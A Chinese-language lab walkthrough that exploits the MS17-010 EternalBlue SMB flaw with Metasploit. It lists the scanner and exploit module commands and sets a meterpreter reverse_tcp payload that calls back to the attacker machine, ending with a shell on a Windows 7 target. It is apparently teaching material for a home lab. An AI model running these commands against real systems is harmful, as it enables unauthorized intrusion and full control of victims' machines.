永恒之蓝概述

ms17-010（永恒之蓝）漏洞是由Shadow Brokers（影子经纪人）在2017年4月公布的大批漏洞之一，该漏洞利用Windows系统的SMB漏洞可以获取系统最高权限。曾经席卷全球的Wanna cry勒索病毒就是不法分子基于该漏洞进行改造。

实验环境

攻击机：Kali Linux
攻击机ip地址：192.168.0.133

被攻击机：Windows 7 Home Basic 7601 Service Pack 1 x64
被攻击机ip地址：192.168.0.135
环境搭建传送门:Kali Linux安装与使用指南

实验过程

第一步：扫描漏洞

进入msf以后我们用search ms17-010查找该漏洞有关的模块

扫描目标主机存不存在该漏洞我们用auxiliary/scanner/smb/smb_ms17_010这个模块
使用方法

use auxiliary/scanner/smb/smb_ms17_010
set rhosts   192.168.0.135
set threads  100
run

我们可以看到该主机存在该漏洞

第二步：渗透攻击

利用exploit/windows/smb/ms17_010_eternalblue模块来攻击该机器

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.135
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.133
run

其中 rhost为目标主机ip，lhost为攻击机器的ip




从结果来看，显示攻击成功并且拿到了shell权限了，这时候我们就可以为所欲为。

第三步:漏洞利用

输入help可以查看能够利用的命令

截屏

其他操作我们根据meterpreter 相关的命令执行即可。